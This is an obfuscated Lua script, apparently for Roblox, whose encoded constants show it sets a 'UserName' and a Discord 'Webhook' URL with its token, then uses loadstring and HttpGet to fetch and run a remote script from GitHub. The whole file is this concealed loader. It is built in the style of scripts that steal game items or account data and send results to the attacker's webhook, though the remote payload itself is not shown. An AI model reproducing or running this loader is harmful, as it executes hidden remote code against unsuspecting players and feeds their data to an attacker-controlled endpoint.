--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v99=v5(v71,v19);v19=nil;return v99;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(928 -(214 + 713)))))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -(1271 -(226 + 1044))))) ;return v72-(v72%1) ;else local v73=1637 -(1523 + 114) ;local v74;while true do if (v73==0) then v74=((2704 -2083) -(555 + 64))^(v32-((1049 -(32 + 85)) -(857 + 74))) ;return (((v31%(v74 + v74))>=v74) and 1) or ((1044 + 21) -(68 + 997)) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=351 -(87 + (443 -(67 + 113))) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v41 * (30433252 -13656036)) + (v40 * 65536) + (v39 * (187 + 69)) + v38 ;end local function v24()local v42=997 -(915 + 82) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -3)) then v47=v20(v44,13 + (29 -21) ,40 -9 );v48=((v20(v44,1219 -((3795 -2726) + 118) )==(2 -1)) and  -(1 -(859 -(814 + 45)))) or (1 + (0 -0)) ;v42=4 -1 ;end if (v42==(0 + 0 + 0)) then v43=v23();v44=v23();v42=792 -(368 + 150 + 273) ;end if (v42==(9 -6)) then if (v47==(18 -(10 + 8))) then if (v46==0) then return v48 * (0 -0) ;else v47=443 -(416 + 26) ;v45=0 -0 ;end elseif (v47==(879 + (2053 -(261 + 624)))) then return ((v46==0) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-((2581 -1128) -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^52))) ;end if (v42==(1 + 0)) then v45=1;v46=(v20(v44,1 + 0 ,792 -(201 + 571) ) * (((2220 -(1020 + 60)) -((1539 -(630 + 793)) + 1022))^(133 -(342 -241)))) + v43 ;v42=2 + 0 ;end end end local function v25(v49)local v50;if  not v49 then local v75=0;while true do if (v75==(0 -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v68=1, #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1 -0)) then v55=nil;v56=nil;v52=4 -2 ;end if (v52~=(532 -(406 + 123))) then else v59=nil;v60=nil;v52=1773 -(1749 + 20) ;end if (v52~=(1 + 1)) then else v57=nil;v58=nil;v52=3;end if (v52~=(2 + 2)) then else while true do if (v53~=0) then else local v96=0;while true do if ((1323 -(1249 + 73))~=v96) then else v53=1 + 0 ;break;end if (v96~=(1227 -(322 + 905))) then else v54=1145 -(466 + 679) ;v55=nil;v96=2 -1 ;end end end if (v53~=(5 -3)) then else local v97=1900 -(106 + 1794) ;while true do if (v97==(872 -(826 + 46))) then v58=nil;v59=nil;v97=1 + 0 ;end if (v97==(948 -(245 + 702))) then v53=9 -6 ;break;end end end if (v53==3) then v60=nil;while true do local v100=0 + 0 ;while true do if (v100~=(0 -0)) then else if (v54==(1899 -(260 + 1638))) then local v105=0 -0 ;local v106;while true do if (v105~=0) then else v106=0;while true do if (v106~=(440 -(382 + 58))) then else local v160=0;while true do if (v160==(115 -(4 + 110))) then v106=3 -2 ;break;end if (v160==(584 -(57 + 527))) then local v174=1427 -(41 + 1386) ;while true do if ((1 -0)==v174) then v160=1;break;end if (v174~=(103 -(17 + 86))) then else v59=v23();v60={};v174=1 + 0 ;end end end end end if (v106~=(1 -0)) then else for v163=1,v59 do local v164=0 -0 ;local v165;local v166;local v167;local v168;while true do if ((166 -(122 + 44))==v164) then v165=0 -0 ;v166=nil;v164=215 -(22 + 192) ;end if (v164~=(684 -(483 + 200))) then else v167=nil;v168=nil;v164=2;end if (v164~=2) then else while true do if (v165==(1464 -(1404 + 59))) then v168=nil;while true do if (v166~=(2 -1)) then else if (v167==(3 -2)) then v168=v21()~=0 ;elseif (v167==2) then v168=v24();elseif (v167==(3 + 0)) then v168=v25();end v60[v163]=v168;break;end if (v166~=(562 -(334 + 228))) then else local v180=0 + 0 ;local v181;while true do if (v180==0) then v181=0;while true do if (v181==(0 -0)) then local v189=65 -(30 + 35) ;while true do if (v189==0) then local v191=0 + 0 ;while true do if (v191~=(2 -1)) then else v189=1;break;end if (v191~=(0 -0)) then else v167=v21();v168=nil;v191=1;end end end if (v189==(1 + 0)) then v181=1258 -(1043 + 214) ;break;end end end if (1~=v181) then else v166=1 + 0 ;break;end end break;end end end end break;end if ((0 -0)==v165) then v166=0 -0 ;v167=nil;v165=1213 -(323 + 889) ;end end break;end end end v58[1 + 2 ]=v21();v106=5 -3 ;end if (v106~=(582 -(361 + 219))) then else v54=2;break;end end break;end end end if (v54==(322 -(53 + 267))) then local v107=0 + 0 ;local v108;while true do if (v107==(413 -(15 + 398))) then v108=982 -(18 + 964) ;while true do local v150=0 -0 ;local v151;while true do if ((0 -0)==v150) then v151=0 + 0 ;while true do if (v151==(0 + 0)) then if (v108==(850 -(20 + 830))) then local v177=0 + 0 ;while true do if (v177==0) then for v182=1 + 0 ,v23() do local v183=126 -(116 + 10) ;local v184;local v185;local v186;while true do if (v183~=(0 + 0)) then else v184=0 + 0 ;v185=nil;v183=739 -(542 + 196) ;end if (v183~=(850 -(254 + 595))) then else v186=nil;while true do if (v184~=(126 -(55 + 71))) then else local v190=0 -0 ;while true do if (v190==(0 + 0)) then v185=0 + 0 ;v186=nil;v190=1 + 0 ;end if (v190~=(2 -1)) then else v184=2 -1 ;break;end end end if (v184==1) then while true do if (v185~=(1551 -(1126 + 425))) then else v186=v21();if (v20(v186,406 -(118 + 287) ,1)~=(0 + 0)) then else local v192=0 -0 ;local v193;local v194;local v195;local v196;local v197;while true do if (v192~=(939 -(714 + 225))) then else v193=0 -0 ;v194=nil;v192=1122 -(118 + 1003) ;end if (v192==(1 + 0)) then v195=nil;v196=nil;v192=2;end if (2==v192) then v197=nil;while true do if (v193==(2 -1)) then local v198=806 -(118 + 688) ;local v199;while true do if (v198==(48 -(25 + 23))) then v199=0;while true do if (v199~=(1 + 0)) then else v193=379 -(142 + 235) ;break;end if (v199==(0 -0)) then local v210=732 -(16 + 716) ;while true do if (v210==(0 -0)) then v196=nil;v197=nil;v210=1;end if (v210~=(4 -3)) then else v199=98 -(11 + 86) ;break;end end end end break;end end end if (v193==(1 + 1)) then while true do if (v194==(979 -(553 + 424))) then local v201=285 -(175 + 110) ;local v202;while true do if (v201==0) then v202=0;while true do if (v202~=(1 -0)) then else v194=6 -3 ;break;end if (v202==(0 + 0)) then local v211=0 + 0 ;local v212;while true do if (v211~=0) then else v212=0;while true do if (v212~=(2 -1)) then else v202=1;break;end if ((0 + 0)==v212) then local v217=0;while true do if (v217==(1 + 0)) then v212=1;break;end if (v217~=(1061 -(810 + 251))) then else if (v20(v196,1 + 0 ,2 -1 )~=(1 + 0)) then else v197[2 + 0 ]=v60[v197[2]];end if (v20(v196,2,2)==(2 -1)) then v197[736 -(711 + 22) ]=v60[v197[6 -3 ]];end v217=1;end end end end break;end end end end break;end end end if (v194~=0) then else local v203=0;local v204;while true do if ((0 + 0)~=v203) then else v204=0;while true do if (v204==(4 -3)) then v194=1 + 0 ;break;end if (v204==0) then local v213=753 -(239 + 514) ;local v214;while true do if (v213==(0 + 0)) then v214=0 + 0 ;while true do if (v214==(1744 -(1344 + 400))) then local v218=1329 -(797 + 532) ;while true do if (v218==1) then v214=406 -(255 + 150) ;break;end if (v218~=0) then else v195=v20(v186,2 + 0 ,3 + 0 );v196=v20(v186,3 + 1 ,6);v218=1 + 0 ;end end end if (v214~=1) then else v204=2 -1 ;break;end end break;end end end end break;end end end if (v194==(1205 -(373 + 829))) then if (v20(v196,3,3)==(732 -(476 + 255))) then v197[410 -(183 + 223) ]=v60[v197[1134 -(369 + 761) ]];end v55[v182]=v197;break;end if (v194==(1 + 0)) then local v206=0 -0 ;local v207;while true do if (v206==0) then v207=0 + 0 ;while true do if (v207==(0 + 0)) then local v215=0 -0 ;local v216;while true do if (v215~=(238 -(64 + 174))) then else v216=0 + 0 ;while true do if (v216~=(0 + 0)) then else v197={v22(),v22(),nil,nil};if (v195==(0 + 0)) then local v219=449 -(108 + 341) ;local v220;local v221;local v222;while true do if (v219==(0 + 0)) then v220=0;v221=nil;v219=1;end if (v219~=(1 + 0)) then else v222=nil;while true do if (v220~=0) then else v221=0;v222=nil;v220=1 + 0 ;end if (v220==(1494 -(711 + 782))) then while true do if (v221==(0 -0)) then v222=0;while true do if (v222==(0 + 0)) then v197[1507 -(363 + 1141) ]=v22();v197[1584 -(1183 + 397) ]=v22();break;end end break;end end break;end end break;end end elseif (v195==1) then v197[3]=v23();elseif (v195==(5 -3)) then v197[3]=v23() -((2 + 0)^(12 + 4)) ;elseif (v195~=(1978 -(1913 + 62))) then else local v229=0 + 0 ;while true do if (v229==(0 -0)) then v197[1936 -(565 + 1368) ]=v23() -((7 -5)^(1677 -(1477 + 184))) ;v197[5 -1 ]=v22();break;end end end v216=1 + 0 ;end if (v216==(1 + 0)) then v207=857 -(564 + 292) ;break;end end break;end end end if (v207==(1 + 0)) then v194=1 + 1 ;break;end end break;end end end end break;end if (v193~=(0 -0)) then else local v200=0 + 0 ;while true do if (v200~=1) then else v193=1168 -(645 + 522) ;break;end if (v200~=(0 -0)) then else v194=0;v195=nil;v200=1 + 0 ;end end end end break;end end end break;end end break;end end break;end end end for v187=4 -3 ,v23() do v56[v187-1 ]=v28();end v177=2 -1 ;end if (v177~=(2 -1)) then else v108=305 -(244 + 60) ;break;end end end if (v108~=(1 + 0)) then else return v58;end break;end end break;end end end break;end end end v100=1;end if ((477 -(41 + 435))==v100) then if (v54==(1001 -(938 + 63))) then local v109=0;local v110;local v111;while true do if (v109==0) then v110=0;v111=nil;v109=1;end if (v109~=(1 + 0)) then else while true do if (v110~=(1125 -(936 + 189))) then else v111=0 + 0 ;while true do if (v111~=(267 -(28 + 238))) then else local v175=0 -0 ;while true do if ((1613 -(1565 + 48))~=v175) then else local v178=0 + 0 ;while true do if (v178~=(1138 -(782 + 356))) then else v57={};v58={v55,v56,nil,v57};v178=1 + 0 ;end if (v178~=1) then else v175=3 -2 ;break;end end end if (1~=v175) then else v111=2;break;end end end if ((2 -0)==v111) then v54=471 -(381 + 89) ;break;end if (v111~=(1092 -(975 + 117))) then else local v176=1875 -(157 + 1718) ;while true do if (v176==(0 + 0)) then v55={};v56={};v176=1 + 0 ;end if ((1157 -(1074 + 82))==v176) then v111=3 -2 ;break;end end end end break;end end break;end end end break;end end end break;end if (v53==1) then local v98=0 -0 ;while true do if (v98==(1784 -(214 + 1570))) then v56=nil;v57=nil;v98=1456 -(990 + 465) ;end if (v98==(1019 -(697 + 321))) then v53=5 -3 ;break;end end end end break;end if (v52~=(0 + 0)) then else v53=0;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then do return;end else do return;end end elseif (v92<=2) then v83=v91[3];elseif (v92==3) then v89[v91[2]]=v91[3];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=7) then if (v92<=5) then v89[v91[2]]();elseif (v92==6) then local v123=v91[2];v89[v123]=v89[v123](v13(v89,v123 + 1 ,v84));else v63[v91[3]]=v89[v91[2]];end elseif (v92<=8) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==9) then v63[v91[3]]=v89[v91[2]];else v89[v91[2]]=v91[3];end elseif (v92<=15) then if (v92<=12) then if (v92>11) then v89[v91[2]]();else local v114=v91[2];v89[v114]=v89[v114](v13(v89,v114 + 1 ,v84));end elseif (v92<=13) then v89[v91[2]]=v63[v91[3]];elseif (v92>14) then v83=v91[3];else local v132=v91[2];local v133=v89[v91[3]];v89[v132 + 1 ]=v133;v89[v132]=v133[v91[4]];end elseif (v92<=18) then if (v92<=16) then local v118=0;local v119;local v120;while true do if (v118==1) then v89[v119 + 1 ]=v120;v89[v119]=v120[v91[4]];break;end if (0==v118) then v119=v91[2];v120=v89[v91[3]];v118=1;end end elseif (v92==17) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==0) then v138=v91[2];v139,v140=v82(v89[v138](v13(v89,v138 + 1 ,v91[3])));v137=1;end if (v137==2) then for v169=v138,v84 do v141=v141 + 1 ;v89[v169]=v139[v141];end break;end if (1==v137) then v84=(v140 + v138) -1 ;v141=0;v137=2;end end else local v142=v91[2];local v143,v144=v82(v89[v142](v13(v89,v142 + 1 ,v91[3])));v84=(v144 + v142) -1 ;local v145=0;for v157=v142,v84 do local v158=0;while true do if (v158==0) then v145=v145 + 1 ;v89[v157]=v143[v145];break;end end end end elseif (v92<=19) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92>20) then v89[v91[2]]=v91[3]~=0 ;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030E3O00526F6D616E5F3132333534363738030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31362O3538393137392O30333035323034322F39564951733765545A526F4F4B425668486E63445652752D793064344F3576557038423157357956365F382O515849324F4B2O7233713959514534786C63694B6255327600173O00120A3O00013O0026043O000E000100020004023O000E000100120A000100043O001207000100033O00120D000100053O00120D000200063O00201000020002000700120A000400084O0015000500014O0012000200054O000B00013O00022O00050001000100010004023O001600010026043O0001000100010004023O0001000100120A000100043O001207000100093O00120A0001000B3O0012070001000A3O00120A3O00023O0004023O000100016O00017O00",v9(),...);
